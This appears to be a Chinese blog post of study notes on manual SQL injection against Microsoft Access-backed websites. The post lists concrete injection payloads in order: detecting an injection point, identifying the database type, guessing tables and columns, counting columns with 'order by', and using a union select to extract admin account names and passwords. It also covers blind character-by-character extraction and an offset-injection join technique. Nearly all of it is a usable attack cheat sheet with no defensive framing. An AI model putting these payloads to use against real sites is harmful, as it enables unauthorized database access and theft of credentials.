ACCESS手工注入学习笔记

                  ACCESS注入

一:判断注入点

‘        报错

and 1=1   正确

and 1=2   报错

or 1=1    报错

or 1=2    正确

and 1=111

判断是否带入连接查询:返回正确的话带入连接查询。报错则不带入。

二:判断数据库类型

and exsits (select * from msysobjects) >0       ACCESS

and exsits (select * from sysobjects) >0       SQL server

三:判断数据库表

and exists(select * from admin)       判断存不存在这个表

四:判断字段名

and exists(select 猜测的字段名 from admin)

五:判断字段长度

order by 猜测的长度

六:报错

and 1=2 union select 1,2,3,4,5,6...,字段长度 from admin

:报错35,35改成adminpasswd爆出账号密码

七:判断账号密码的长度、内容

and (select len(字段名) from 表名)=猜测长度

and (select top 1 asc(mid(列名,第几位,1)) from 表名)=97 a

八:偏移注入

1、利用*”代替admin表内存在的字段,从最后的字段开始逐步测试,直到返回正常。

2、基本公式:order by出的字段数减去*号的字段数,然后再用order by的字段数减去2倍刚才得出来的答案

3、union select 1,2,3,4,a.id,b.id,* from (sys_admin as a inner join sys_admin as b on a.id = b.id)

#这里union select 1,2,3,4 顾名思义就是基础公式得出来的长度。

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值